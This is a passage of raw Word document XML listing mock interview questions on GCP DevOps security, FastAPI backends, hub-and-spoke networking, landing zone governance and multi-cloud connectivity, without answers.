          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How do you secure Terraform state in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How do you prevent infrastructure drift?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you secure GKE clusters?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Explain IAM best practices in GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How do you review Terraform code from a risk perspective?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you integrate security into CI/CD pipelines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What risks exist when using service accounts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you implement least privilege across GCP projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do you monitor cloud security and compliance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you perform a risk assessment before deploying a new Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How do you ensure Infrastructure as Code changes are compliant before deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Describe a cloud security incident you investigated and the lessons learned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 39 - FastAPI Backend Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. FastAPI fundamentals: How would you structure a production FastAPI service with routers, dependencies, schemas, settings, and clear module boundaries?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. FastAPI request validation: How do Pydantic models, response models, and validation errors help keep APIs safe and predictable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. FastAPI async: When should a FastAPI endpoint be async, and what mistakes can block the event loop in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. FastAPI security: How would you implement JWT/OAuth2 authentication, role-based access, secret handling, and least privilege for internal APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. FastAPI observability: What logs, metrics, traces, request IDs, and health endpoints would you add before deploying a FastAPI service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. FastAPI deployment: How would you deploy FastAPI with Uvicorn/Gunicorn, containers, Kubernetes/GKE, autoscaling, probes, and graceful shutdown?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. FastAPI performance: A FastAPI endpoint has high p95 latency. How would you debug code, database calls, external APIs, concurrency, and infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. FastAPI production readiness: What checklist would you use before approving a FastAPI service for production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 40 - Network Hub Scope and Hub-Spoke Risk Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is a network hub-and-spoke architecture, and why do organizations use it in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What should be included in the scope of a network hub project?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you design Shared VPC with host and service projects for a hub-and-spoke model?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How does Network Connectivity Center help in a hub-and-spoke network design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What are the routing risks in a hub-and-spoke architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you manage firewall rules centrally while still allowing application team ownership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you design DNS resolution across hub, spoke, on-premises, and private GCP services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What are the security risks of VPC peering, and what limitations should you consider?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you design outbound internet access through Cloud NAT or centralized egress controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you segment production, non-production, shared services, and third-party connectivity in a hub network?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What monitoring, logging, and KRIs would you define for network hub risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you perform a risk assessment before onboarding a new spoke project or VPC into the hub?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 41 - GCP Landing Zone Risk and Governance Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is a GCP landing zone, and why is it important for enterprise cloud adoption?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What core components would you include in a secure GCP landing zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you design the GCP organization, folder, and project hierarchy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Which GCP organization policies would you enforce as part of a secure baseline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How would you design IAM and access management for a landing zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you design networking for a GCP landing zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you implement centralized logging, monitoring, and audit evidence in a landing zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you manage security controls such as SCC, KMS, Secret Manager, vulnerability scanning, and policy-as-code?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you handle billing, budgets, labels, cost allocation, and FinOps in a landing zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you onboard new application teams or projects into the landing zone safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What are common risks or anti-patterns in GCP landing zone implementation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you assess whether an existing GCP landing zone is mature and compliant?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 42 - Multi-Cloud Network Connectivity Risk Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you design secure network connectivity between GCP, AWS, and Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What are the main connectivity options for multi-cloud networking, and when would you choose VPN versus dedicated connectivity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you plan IP address ranges to avoid overlap across multiple cloud providers and on-premises networks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you design routing between GCP Cloud Router, AWS Transit Gateway, Azure Virtual WAN, and on-premises networks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What are the security risks of transitive routing in a multi-cloud network?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you design DNS resolution across GCP, AWS, Azure, and on-premises environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you segment production, non-production, shared services, and third-party traffic across multiple clouds?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you design centralized ingress and egress security controls for multi-cloud workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you monitor multi-cloud network connectivity, latency, packet loss, route changes, and availability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you troubleshoot an application latency issue between GCP and AWS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What disaster recovery and resilience considerations apply to multi-cloud connectivity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you perform a technology risk assessment for a new multi-cloud network connection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 43 - LLMOps / GenAI Production Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
